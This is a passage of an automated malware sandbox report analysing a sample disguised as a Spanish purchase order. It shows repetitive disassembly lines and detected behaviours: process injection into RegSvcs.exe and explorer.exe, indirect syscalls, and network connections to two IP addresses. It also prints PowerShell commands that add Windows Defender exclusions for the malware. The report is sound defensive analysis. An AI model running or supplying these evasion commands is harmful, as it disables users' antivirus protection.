          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018729A0 mov eax, dword ptr fs:[00000030h]9_2_018729A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018609AD mov eax, dword ptr fs:[00000030h]9_2_018609AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018609AD mov eax, dword ptr fs:[00000030h]9_2_018609AD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E89B3 mov esi, dword ptr fs:[00000030h]9_2_018E89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E89B3 mov eax, dword ptr fs:[00000030h]9_2_018E89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E89B3 mov eax, dword ptr fs:[00000030h]9_2_018E89B3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192A9D3 mov eax, dword ptr fs:[00000030h]9_2_0192A9D3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F69C0 mov eax, dword ptr fs:[00000030h]9_2_018F69C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186A9D0 mov eax, dword ptr fs:[00000030h]9_2_0186A9D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018949D0 mov eax, dword ptr fs:[00000030h]9_2_018949D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE9E0 mov eax, dword ptr fs:[00000030h]9_2_018EE9E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018929F9 mov eax, dword ptr fs:[00000030h]9_2_018929F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018929F9 mov eax, dword ptr fs:[00000030h]9_2_018929F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE908 mov eax, dword ptr fs:[00000030h]9_2_018DE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DE908 mov eax, dword ptr fs:[00000030h]9_2_018DE908
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EC912 mov eax, dword ptr fs:[00000030h]9_2_018EC912
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01858918 mov eax, dword ptr fs:[00000030h]9_2_01858918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01858918 mov eax, dword ptr fs:[00000030h]9_2_01858918
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E892A mov eax, dword ptr fs:[00000030h]9_2_018E892A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F892B mov eax, dword ptr fs:[00000030h]9_2_018F892B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018E0946 mov eax, dword ptr fs:[00000030h]9_2_018E0946
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934940 mov eax, dword ptr fs:[00000030h]9_2_01934940
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A096E mov eax, dword ptr fs:[00000030h]9_2_018A096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A096E mov edx, dword ptr fs:[00000030h]9_2_018A096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018A096E mov eax, dword ptr fs:[00000030h]9_2_018A096E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01904978 mov eax, dword ptr fs:[00000030h]9_2_01904978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01904978 mov eax, dword ptr fs:[00000030h]9_2_01904978
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01886962 mov eax, dword ptr fs:[00000030h]9_2_01886962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01886962 mov eax, dword ptr fs:[00000030h]9_2_01886962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01886962 mov eax, dword ptr fs:[00000030h]9_2_01886962
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EC97C mov eax, dword ptr fs:[00000030h]9_2_018EC97C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860887 mov eax, dword ptr fs:[00000030h]9_2_01860887
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EC89D mov eax, dword ptr fs:[00000030h]9_2_018EC89D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188E8C0 mov eax, dword ptr fs:[00000030h]9_2_0188E8C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_019308C0 mov eax, dword ptr fs:[00000030h]9_2_019308C0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C8F9 mov eax, dword ptr fs:[00000030h]9_2_0189C8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189C8F9 mov eax, dword ptr fs:[00000030h]9_2_0189C8F9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192A8E4 mov eax, dword ptr fs:[00000030h]9_2_0192A8E4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EC810 mov eax, dword ptr fs:[00000030h]9_2_018EC810
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190483A mov eax, dword ptr fs:[00000030h]9_2_0190483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190483A mov eax, dword ptr fs:[00000030h]9_2_0190483A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189A830 mov eax, dword ptr fs:[00000030h]9_2_0189A830
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882835 mov eax, dword ptr fs:[00000030h]9_2_01882835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882835 mov eax, dword ptr fs:[00000030h]9_2_01882835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882835 mov eax, dword ptr fs:[00000030h]9_2_01882835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882835 mov ecx, dword ptr fs:[00000030h]9_2_01882835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882835 mov eax, dword ptr fs:[00000030h]9_2_01882835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01882835 mov eax, dword ptr fs:[00000030h]9_2_01882835
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01872840 mov ecx, dword ptr fs:[00000030h]9_2_01872840
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01890854 mov eax, dword ptr fs:[00000030h]9_2_01890854
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864859 mov eax, dword ptr fs:[00000030h]9_2_01864859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01864859 mov eax, dword ptr fs:[00000030h]9_2_01864859
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE872 mov eax, dword ptr fs:[00000030h]9_2_018EE872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018EE872 mov eax, dword ptr fs:[00000030h]9_2_018EE872
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6870 mov eax, dword ptr fs:[00000030h]9_2_018F6870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6870 mov eax, dword ptr fs:[00000030h]9_2_018F6870
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01914BB0 mov eax, dword ptr fs:[00000030h]9_2_01914BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01914BB0 mov eax, dword ptr fs:[00000030h]9_2_01914BB0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870BBE mov eax, dword ptr fs:[00000030h]9_2_01870BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01870BBE mov eax, dword ptr fs:[00000030h]9_2_01870BBE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190EBD0 mov eax, dword ptr fs:[00000030h]9_2_0190EBD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01880BCB mov eax, dword ptr fs:[00000030h]9_2_01880BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01880BCB mov eax, dword ptr fs:[00000030h]9_2_01880BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01880BCB mov eax, dword ptr fs:[00000030h]9_2_01880BCB
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860BCD mov eax, dword ptr fs:[00000030h]9_2_01860BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860BCD mov eax, dword ptr fs:[00000030h]9_2_01860BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860BCD mov eax, dword ptr fs:[00000030h]9_2_01860BCD
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188EBFC mov eax, dword ptr fs:[00000030h]9_2_0188EBFC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868BF0 mov eax, dword ptr fs:[00000030h]9_2_01868BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868BF0 mov eax, dword ptr fs:[00000030h]9_2_01868BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868BF0 mov eax, dword ptr fs:[00000030h]9_2_01868BF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018ECBF0 mov eax, dword ptr fs:[00000030h]9_2_018ECBF0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018DEB1D mov eax, dword ptr fs:[00000030h]9_2_018DEB1D
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934B00 mov eax, dword ptr fs:[00000030h]9_2_01934B00
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188EB20 mov eax, dword ptr fs:[00000030h]9_2_0188EB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188EB20 mov eax, dword ptr fs:[00000030h]9_2_0188EB20
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01928B28 mov eax, dword ptr fs:[00000030h]9_2_01928B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01928B28 mov eax, dword ptr fs:[00000030h]9_2_01928B28
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0190EB50 mov eax, dword ptr fs:[00000030h]9_2_0190EB50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01932B57 mov eax, dword ptr fs:[00000030h]9_2_01932B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01932B57 mov eax, dword ptr fs:[00000030h]9_2_01932B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01932B57 mov eax, dword ptr fs:[00000030h]9_2_01932B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01932B57 mov eax, dword ptr fs:[00000030h]9_2_01932B57
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6B40 mov eax, dword ptr fs:[00000030h]9_2_018F6B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018F6B40 mov eax, dword ptr fs:[00000030h]9_2_018F6B40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0192AB40 mov eax, dword ptr fs:[00000030h]9_2_0192AB40
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01908B42 mov eax, dword ptr fs:[00000030h]9_2_01908B42
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01858B50 mov eax, dword ptr fs:[00000030h]9_2_01858B50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01914B4B mov eax, dword ptr fs:[00000030h]9_2_01914B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01914B4B mov eax, dword ptr fs:[00000030h]9_2_01914B4B
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0185CB7E mov eax, dword ptr fs:[00000030h]9_2_0185CB7E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0186EA80 mov eax, dword ptr fs:[00000030h]9_2_0186EA80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01934A80 mov eax, dword ptr fs:[00000030h]9_2_01934A80
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01898A90 mov edx, dword ptr fs:[00000030h]9_2_01898A90
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868AA0 mov eax, dword ptr fs:[00000030h]9_2_01868AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01868AA0 mov eax, dword ptr fs:[00000030h]9_2_01868AA0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B6AA4 mov eax, dword ptr fs:[00000030h]9_2_018B6AA4
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B6ACC mov eax, dword ptr fs:[00000030h]9_2_018B6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B6ACC mov eax, dword ptr fs:[00000030h]9_2_018B6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018B6ACC mov eax, dword ptr fs:[00000030h]9_2_018B6ACC
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01860AD0 mov eax, dword ptr fs:[00000030h]9_2_01860AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01894AD0 mov eax, dword ptr fs:[00000030h]9_2_01894AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01894AD0 mov eax, dword ptr fs:[00000030h]9_2_01894AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189AAEE mov eax, dword ptr fs:[00000030h]9_2_0189AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189AAEE mov eax, dword ptr fs:[00000030h]9_2_0189AAEE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_018ECA11 mov eax, dword ptr fs:[00000030h]9_2_018ECA11
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0188EA2E mov eax, dword ptr fs:[00000030h]9_2_0188EA2E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189CA24 mov eax, dword ptr fs:[00000030h]9_2_0189CA24
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_0189CA38 mov eax, dword ptr fs:[00000030h]9_2_0189CA38
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01884A35 mov eax, dword ptr fs:[00000030h]9_2_01884A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01884A35 mov eax, dword ptr fs:[00000030h]9_2_01884A35
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866A50 mov eax, dword ptr fs:[00000030h]9_2_01866A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866A50 mov eax, dword ptr fs:[00000030h]9_2_01866A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866A50 mov eax, dword ptr fs:[00000030h]9_2_01866A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866A50 mov eax, dword ptr fs:[00000030h]9_2_01866A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866A50 mov eax, dword ptr fs:[00000030h]9_2_01866A50
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 9_2_01866A50 mov eax, dword ptr fs:[00000030h]9_2_01866A50
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeCode function: 14_2_00211B93 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,14_2_00211B93
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.92 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 198.185.159.144 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Orden de compra 0307AR24.exe"Jump to behavior
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exe"Jump to behavior
          Allocates memory in foreign processes
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and writeJump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeNtClose: Indirect: 0x13AA56C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeNtClose: Indirect: 0x1AEA56C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeNtQueueApcThread: Indirect: 0x1AEA4F2
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeNtQueueApcThread: Indirect: 0x13AA4F2Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeNtClose: Indirect: 0x1AAA56C
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeNtQueueApcThread: Indirect: 0x1AAA4F2
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\Orden de compra 0307AR24.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Users\user\AppData\Roaming\RggSaCWUvAyNK.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\systray.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\systray.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: NULL target: C:\Windows\SysWOW64\rundll32.exe protection: execute and read and write
